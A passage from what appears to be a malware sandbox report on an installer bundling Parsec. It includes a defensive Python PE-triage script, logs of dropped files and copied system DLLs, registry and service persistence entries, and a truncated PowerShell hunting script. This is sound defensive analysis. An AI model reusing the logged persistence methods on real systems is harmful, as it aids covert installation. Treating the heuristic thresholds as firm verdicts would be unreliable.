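        name = blob[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", blob, off + 8)
        raw = blob[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "raw_size": raw_size,
                         "entropy": round(shannon_entropy(raw), 3)})
    return {"machine": machine, "timestamp": stamp, "sections": sections}

def triage(blob: bytes, now: Optional[int] = None) -> List[str]:
    """Return human-readable findings for the three static checks."""
    info = parse_pe(blob)
    now = int(time.time()) if now is None else now
    findings = []
    stamp = info["timestamp"]
    if stamp > now:   # a link time in the future is a classic stomped/forged stamp
        when = datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC")
        findings.append(f"future TimeDateStamp 0x{stamp:08X} [{when}]")
    for s in info["sections"]:
        if s["name"] not in COMMON_SECTIONS:
            findings.append(f"uncommon section name {s['name']!r}")
        if s["entropy"] > 7.0:
            findings.append(f"high entropy {s['entropy']} in {s['name']}")
    return findings

def build_pe(stamp: int, sections: List[Tuple[str, bytes]]) -> bytes:
    """Construct a minimal, non-loadable PE32+ image for offline testing."""
    align = 0x200
    opt_size = 0xF0                          # PE32+ optional header size
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), stamp, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)    # PE32+ magic
    headers = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    raw_ptr = (headers + align - 1) // align * align
    table, body = bytearray(), bytearray()
    for name, data in sections:
        raw_size = (len(data) + align - 1) // align * align
        table += name.encode("ascii").ljust(8, b"\0")
        table += struct.pack("<IIIIIIHHI", len(data), 0x1000 + len(body), raw_size,
                             raw_ptr + len(body), 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
    image = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)).ljust(raw_ptr, b"\0")
    return image + bytes(body)

if __name__ == "__main__":
    # Constructed sample: the report's 2077 stamp, a bland .text and a
    # Detours-style .detourd section filled with maximally uniform bytes.
    sample = build_pe(0xC9B97BBC, [(".text", b"\x90" * 512),
                                   (".detourd", bytes(range(256)) * 2)])
    for line in triage(sample):
        print(line)
```

Point triage() at the bytes of any dropped file (for example the is-*.tmp copies Inno Setup leaves in %APPDATA%\PSecWin) to get the same three signals the sandbox reports. The entropy threshold of 7.0 is a rule of thumb: legitimately compressed resources also score high, so treat it as a reason to look, not a verdict.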

Persistence and Installation Behavior

Source: C:\Program Files\Parsec\pservice.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe File created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe File created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-6EGJL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-MGUI8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-NRIH7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\verifier.dll (copy)
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe File created: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-CEDA5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Local\Temp\is-4VCD0.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-P56QD.tmp
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe File created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-86N5H.tmp
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe File created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.sys (copy)
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Program Files\Parsec\pservice.exe
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy)
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Program Files\Parsec\vusb\parsec-vud.exe
Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\SETE85A.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-1CLR0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-H8DB6.tmp
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe File created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\kbdibm02.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\netlogon.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\shrpubw.exe (copy)
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe File created: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\SETDCF0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\wlanext.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-4SSD7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-PBFIO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-G4CQT.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\sscore.dll (copy)
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe File created: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-QSA3H.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-4HGOQ.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Program Files\Parsec\uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-DQG3S.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-BUN5H.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\rdvgocl32.dll (copy)
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe File created: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\SETE77F.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-61CCU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-USCFG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\mcbuilder.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-60VI8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\xwreg.dll (copy)
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Program Files\Parsec\vdd\parsec-vdd.exe
Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.sys (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-ULHI4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\unins000.exe (copy)
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe File created: C:\Users\user\AppData\Local\Temp\nstD696.tmp\UserInfo.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-UI7FB.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\mfc140enu.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\networkhelper.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\wiashext.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\kbd101b.DLL (copy)
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Program Files\Parsec\skel\parsecd-150-93b.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-8G60N.tmp
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe File created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-K5NEU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-HI4IL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\socialapis.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\tapiui.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-HA8AR.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsExec.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Program Files\Parsec\teams.exe
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-H42SM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)
Source: C:\Users\user\Desktop\uu8v4UUzTU.exe File created: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-6DK0L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-O0GNS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-1L3B3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-N73AH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-JRFAI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\ws2help.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-2V0O4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\7z.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-BK2QC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-L6U16.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-PGRCJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\runonce.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-IJKK2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy)
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsDialogs.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\ApplicationID.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy)
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe File created: C:\Users\user\AppData\Local\Temp\nscF857.tmp\nsExec.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-9HECR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-39NTG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-MHHB2.tmp
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe File created: C:\Program Files\Parsec Virtual Display Driver\uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-BOVF1.tmp
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe File created: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\SETFD68.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-I39R4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-HCV6V.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\wups.dll (copy)
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe File created: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe File created: C:\Users\user\AppData\Local\Temp\nstD696.tmp\System.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-G92OK.tmp
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe File created: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\mm.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\netevent.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-HQ9KB.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-0LBKR.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\xpsservices.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy)
Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDEC5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-61DKO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-0BSQ7.tmp
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe File created: C:\Users\user\AppData\Local\Temp\nscF857.tmp\System.dll
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Program Files\Parsec\parsecd.exe
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-PSU9B.tmp
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe File created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe File created: C:\Users\user\AppData\Local\Temp\nstD696.tmp\nsExec.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\is-U20SU.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\Users\user\AppData\Local\Temp\nsvA814.tmp\System.dll
Source: C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp File created: C:\Users\user\AppData\Roaming\PSecWin\kbdarmty.dll (copy)

Boot Survival

Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn ParsecTeams /f
Source: C:\Windows\System32\drvinst.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\parsecvusba
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Parsec
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Parsec\Parsec.lnk
Source: C:\Program Files\Parsec\pservice.exe Code function: 40_2_00007FF7EC022AC0 StartServiceCtrlDispatcherW, 40_2_00007FF7EC022AC0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce GrpConv
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" control Parsec 200
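The entries in this Boot Survival block are the ones worth hunting for on other hosts: a kernel service (Services\parsecvusba) registered by drvinst.exe, a RunOnce value, a scheduled-task deletion and a "sc control Parsec 200" user-defined control code sent from wscript.exe, plus the Start Menu shortcut and the PSecWin staging directory. By contrast, the long run of "Process information set: NOOPENFILEERRORBOX" hits in the next block is just SetErrorMode() with SEM_FAILCRITICALERRORS / SEM_NOOPENFILEERRORBOX, which nearly every installer and Windows system binary sets, and carries almost no signal on its own. The RunOnce\GrpConv value is also a routine side effect of driver and setup installs (it runs grpconv.exe once), so it should be recorded and correlated rather than alerted on. The script below is an added triage example for this report; it is not part of the Joe Sandbox output and not Parsec's code. It assumes it is run elevated on a Windows host, that the service, task, path and driver names are exactly those shown in the report, and it uses CurrentControlSet in place of the report's ControlSet001 alias.

```powershell
# Added triage script for the boot-survival artifacts listed in this report.
# Not part of the Joe Sandbox report or of Parsec; names/paths below are taken
# from the report, the output layout is this script's own. Run elevated.

$findings = New-Object System.Collections.Generic.List[object]

function Add-Finding([string]$Kind, [string]$Detail, [string]$Note) {
    $findings.Add([pscustomobject]@{ Kind = $Kind; Detail = $Detail; Note = $Note })
}

# 1. Services: the driver service created by drvinst.exe and the Parsec service
#    that wscript.exe signalled with "sc control Parsec 200" (a user-defined code).
foreach ($svc in 'parsecvusba', 'Parsec') {
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
    if (Test-Path $key) {
        $image = (Get-ItemProperty $key -ErrorAction SilentlyContinue).ImagePath
        Add-Finding 'Service' "$svc -> $image" 'Report: Services\parsecvusba created by drvinst.exe; sc control Parsec 200'
    }
}

# 2. RunOnce\GrpConv. Written by ordinary driver/setup installs as well, so this is
#    low-signal by itself; keep it for correlation with the items above.
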